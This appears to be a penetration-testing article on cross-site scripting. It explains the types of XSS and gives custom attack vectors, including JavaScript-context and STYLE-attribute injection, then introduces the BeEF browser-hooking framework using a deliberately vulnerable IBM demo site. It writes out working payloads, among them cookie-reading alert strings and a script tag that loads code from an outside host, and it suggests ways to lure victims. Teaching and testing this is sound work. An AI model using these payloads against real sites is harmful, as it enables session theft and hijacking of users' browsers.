One of the largest portals was in news recently when their website was exploited by targeting XSS vulnerability. The person who compromised the website has also notified the portal with screenshots proving successful attack. Information Security chief called an urgent meeting to discuss the issue with his entire team. He asked that we have got application security audit done form third party before going live, we have also trained our developers with secure coding practices, then why this incident happened!! They went to other third party vendor and appointed them to audit the application. Audit team has found that XSS can be possible from the “Custom XSS attack vector” method.
In this paper, I will be explaining two major aspects of Cross Site Scripting Attack:
- Tricky XSS
- Complete control over User’s browser – BeEF
A quick look into the types of XSS:-
- Stored XSS Attacks
- Reflected XSS Attacks
- DOM Based XSS
Stored XSS – Stored XSS are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information.
Reflected XSS – Reflected XSS are those where the injected code is reflected off the web server, such as in an error message, search result, or any other response that includes some or all of the input sent to the server as part of the request. Reflected XSS are delivered to victims via another route, such as in an e-mail message, or on some other web server. When a user is tricked into clicking on a malicious link or submitting a specially crafted form, the injected code travels to the vulnerable web server, which reflects the attack back to the user’s browser. The browser then executes the code because it came from a “trusted” server.
DOM based XSS – DOM Based XSS is an XSS attack wherein the attack payload is executed as a result of modifying the DOM “environment” in the victim’s browser used by the original client side script, so that the client side code runs in an “unexpected” manner. That is, the page itself (the HTTP response that is) does not change, but the client side code contained in the page executes differently due to the malicious modifications that have occurred in the DOM environment.
So, all this is the story about the types of XSS. Now let the real game begin.
XSS attack – more patience, more possibility of attack.
Regular XSS attack strings: –
- “><script >alert(document.cookie)</script>
- <SCRIPT SRC=http://ha.ckers.org/xss.js></SCRIPT>
There are more common attack vectors but we are not going to discuss those in this article, what we are going to discuss is out of box attacks which requires more patience and more beer. 🙂
Custom Attack Vector – I
It’s been encountered many a times that user input values are getting used in client side java script functions at clients’ machine. Generally developers focus more on the GUI part, he will use best encoding technique to encode values which are on the GUI, but most of the time developer forgets about the function in which input value are being used in plain text.
……/tickets-booking /search form’ + ‘&t=’ + (((new Date()).getTime() – began_loading) / 1000)
……/abc/xyz’ + ‘&t=’ + (((new Date()).getTime() – began_loading) / 1000)
‘ + ‘&t=’ + (((new Date()).getTime() – began_loading) / 1000);alert(document.cookie);// in the URL.
……/tickets-booking /search form ‘ + ‘&t=’ + (((new Date()).getTime() – began_loading) / 1000);alert(document.cookie);//’ + ‘&t=’ + (((new Date()).getTime() – began_loading) / 1000)
Custom Attack Vector – II
OpenTicket(‘TaxTDR.aspx’,’qw12345678u’,’9999999999′,’[email protected]’,’55555′,’devil’,’13/02/2012 15:19:13′,’1′,’1′,‘frmTempasad’,”,”,”,”,SegmentID)
Our aim is achieved here, XSS exploited successfully.
One form is available on victim website. This is a part of registration form to register for some scheme on public facing page. Fill the required information in the form, press submit and capture the request in the web proxy tool.
It’s been observed that STYLE attribute is ignored by some of the developers. They block all the miscellaneous events like onclick, onmouseover etc. STYLE attribute xss has limitation of supporting only get execute in IE, but that doesn’t mean we can ignore it.
There is one form on victim website which expects the details of user. Developers have tried their level best to prevent XSS by all the possible methods, but totally ignored STYLE attribute.
The form is processed with the required field and captures the values in proxy tool. Observe in the below screenshot, there is an appended STYLE attribute with the value of XSS attack vector in the input field.
“The Browser Exploitation Framework (BeEF) is a powerful professional security tool. BeEF is pioneering techniques that provide the experienced penetration tester with practical client side attack vectors. Unlike other security frameworks, BeEF focuses on leveraging browser vulnerabilities to assess the security posture of a target. BeEF hooks one or more web browsers as beachheads for the launching of directed command modules. Each browser is likely to be within a different security context, and each context may provide a set of unique attack vectors.” – http://beefproject.com/
Disclaimer: In this entire example section I have used http://demo.testfire.net as a victim site. This website is handled by IBM, and which contains number of vulnerabilities by intention only.
BeEF framework code is available at http://code.google.com/p/beef/downloads/list. Anyone can download and install BeEF, which requires web server, PHP and ruby installation as pre-requisites. Backtrack (BT) has inbuilt setup of BeEF in it. BT users can use it without any installation. In this article, I have used BT to demonstrate.
Lets start it by a simple XSS example. Below in the search filed pass the simple XSS vector, <script>alert(’XSS’)</script>
There are many other ways possible to force victim user to click on this payload, for example by sending one image which has malicious link behind it, or by click jacking attack, or by email etc.